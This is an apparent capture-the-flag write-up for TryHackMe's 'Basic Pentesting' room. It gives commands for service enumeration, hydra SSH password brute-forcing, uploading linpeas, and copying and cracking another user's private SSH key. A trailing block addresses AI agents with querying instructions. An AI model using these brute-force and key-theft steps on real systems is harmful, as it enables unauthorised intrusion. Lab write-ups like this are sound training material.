# Basic Pentesting

Try this challenge in [TryHackMe: **Basic Pentesting**](https://tryhackme.com/r/room/basicpentestingjt)

> In doing this challenge, I learned the following skills and tools:
>
> * **brute forcing** - using <mark style="color:orange;">**hydra**</mark>
> * **hash cracking** - using <mark style="color:orange;">**ssh2john**</mark>, <mark style="color:orange;">**john**</mark>
> * **service enumeration** - using <mark style="color:orange;">**nmap**</mark>, <mark style="color:orange;">**gobuster**</mark>
> * **Linux Enumeration** - using <mark style="color:orange;">**enum4linux**</mark>, <mark style="color:orange;">**linpeas**</mark>

## Web App Testing and Privilege Escalation

### Find the services exposed by the machine

Run <mark style="color:orange;">**nmap**</mark> and save it in basicpentest directory

{% code lineNumbers="true" %}

```bash
mkdir basicpentest
nmap -sC -sV 10.10.X.X -oN basicpentest/initial
```

{% endcode %}

{% hint style="info" %}
Just change the **`10.10.X.X`** to the IP address assigned to your target machine
{% endhint %}

<figure><img src="/files/VKFQD16YLgaz0smswpqI" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/SOMtgDHyScaxMTgnQLjZ" alt="" width="563"><figcaption></figcaption></figure>

Check it in the browser: **`http://10.10.X.X`**

<figure><img src="/files/INop3kcNsnSaiUA38enJ" alt="" width="563"><figcaption></figcaption></figure>

&#x20;Try to **`View Page Source`**. There is a note in green there to <mark style="color:green;">**check their dev note section**</mark>.&#x20;

<figure><img src="/files/sMUT4k7UitTpVJosFOze" alt="" width="563"><figcaption></figcaption></figure>

So let's check if there is a **`/dev`** directory.

<figure><img src="/files/KRhjDoDZ1npUfiBx9ZwG" alt="" width="563"><figcaption></figcaption></figure>

We get **Not Found** responses from both paths, but we can see information disclosure in the responses that are worth noting.

{% hint style="info" %}
**Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80**
{% endhint %}

### What is the name of the hidden directory on the web server (enter name without /)?

Using <mark style="color:orange;">**gobuster**</mark> let's try to figure out what directories are available to the server.

{% code overflow="wrap" %}

```bash
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.X.X
```

{% endcode %}

<figure><img src="/files/HKN2nyk2e0vtntVzEJIh" alt="" width="563"><figcaption></figcaption></figure>

Even without finishing the scan, we get the directory **`/development`**.

When we access the directory, we'll see two text files, **`dev.txt`** and **`j.txt`**. Let's open both.&#x20;

<figure><img src="/files/MijqQCZvofGxLCDjR80B" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/vX9hfzMoirAO47sgWxBv" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/VJKWD5RrDk76wiYi2RZ4" alt=""><figcaption></figcaption></figure>

### User brute-forcing to find the username & password

We found users `jan` & `kay` via <mark style="color:orange;">**enum4linux**</mark>

```bash
/usr/bin/enum4linux -a 10.10.X.X | tee enum4linux.lo
```

<figure><img src="/files/mzD0f3qm0V4bn56KuBPO" alt="" width="563"><figcaption></figcaption></figure>

Using <mark style="color:orange;">**hydra**</mark>, we now know the password

```bash
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X
```

<figure><img src="/files/YC9nF3yqyaFnUOUV75SU" alt="" width="563"><figcaption></figcaption></figure>

Now that we know jan’s credentials, we used them to log in via SSH

Check folders and see if we can find interesting files

<figure><img src="/files/TVJg2GMfo54FDv1gUJsV" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/jaC8KR04v9LvTmMqAzWf" alt="" width="563"><figcaption></figcaption></figure>

Since most actions led to denied permissions, we ran <mark style="color:orange;">**linpeas**</mark> in the machine to check possible privilege escalation methods.

To copy `linpeas.sh` to the machine in the `/dev/shm` folder:

```bash
scp linpeas.sh jan@10.10.X.X:/tmp
```

<figure><img src="/files/FfdIhdt31dzlGoBJaMdJ" alt="" width="563"><figcaption></figcaption></figure>

Check if the linpeas file is transferred successfully

<figure><img src="/files/SLGE41AxPjTD7lCOdIbT" alt="" width="563"><figcaption></figcaption></figure>

Make linpeas executable:

```bash
chmod +x linpeas.sh 
```

Then execute linpeas:

```bash
./linpeas.sh
```

From the linpeas results, we found private SSH keys in the path `/home/kay/.ssh/id_rsa`

<figure><img src="/files/3YjTj1oFHn7DNRnYNo3c" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/sz4a2ZFD7ApBb7ochwVZ" alt="" width="563"><figcaption></figcaption></figure>

Open the id\_rsa file then copy the contents

```bash
cat id_rsa
```

<figure><img src="/files/33rE7gZDw54IFVXHsOKl" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/v5Kmz92zeT4DuiodRbFl" alt="" width="563"><figcaption></figcaption></figure>

In your Kali machine, paste the contents into a file named `kay_id_rsa`

```bash
nano kay_id_rsa
```

<figure><img src="/files/HD1RgjO0vj1K5wHcpFAs" alt="" width="563"><figcaption></figcaption></figure>

Change the permissions of the file to read-writable only by you

```bash
chmod 600 kay_id_rsa
```

Try logging in to the machine using the user Kay’s id\_rsa

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

<figure><img src="/files/MQx4ZSWU7ozdwJ2aAF6b" alt="" width="563"><figcaption></figcaption></figure>

We find that a passphrase is needed for this file.

To figure out the passphrase for kay’s id\_rsa, we used <mark style="color:orange;">**ssh2john**</mark> in the JohnTheRIpper module

```bash
ssh2john ~/kay_id_rsa
```

<figure><img src="/files/UKS6XOO5IYFIrBFQeoUU" alt="" width="563"><figcaption></figcaption></figure>

We need to save this in a text file to be decrypted via <mark style="color:orange;">**john**</mark>

```bash
ssh2john ~/kay_id_rsa > ~/kay_id_rsa_john.txt
```

<figure><img src="/files/FcBi546nHntsmj2L0Yli" alt="" width="563"><figcaption></figcaption></figure>

Using john, we decrypted the file and got the passphrase

<figure><img src="/files/t7Gm1zCP2yTMKDlgzAPq" alt="" width="563"><figcaption></figcaption></figure>

We can now log in using kay’s credentials

```bash
ssh -i kay_id_rsa kay@10.10.X.X
```

{% hint style="success" %}
We opened the **pass.bak** file and then the password was revealed
{% endhint %}

<figure><img src="/files/zZ9HTGwpIu0m1RsVqj2N" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.marialc.com/tryhackme-rooms/basic-pentesting.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.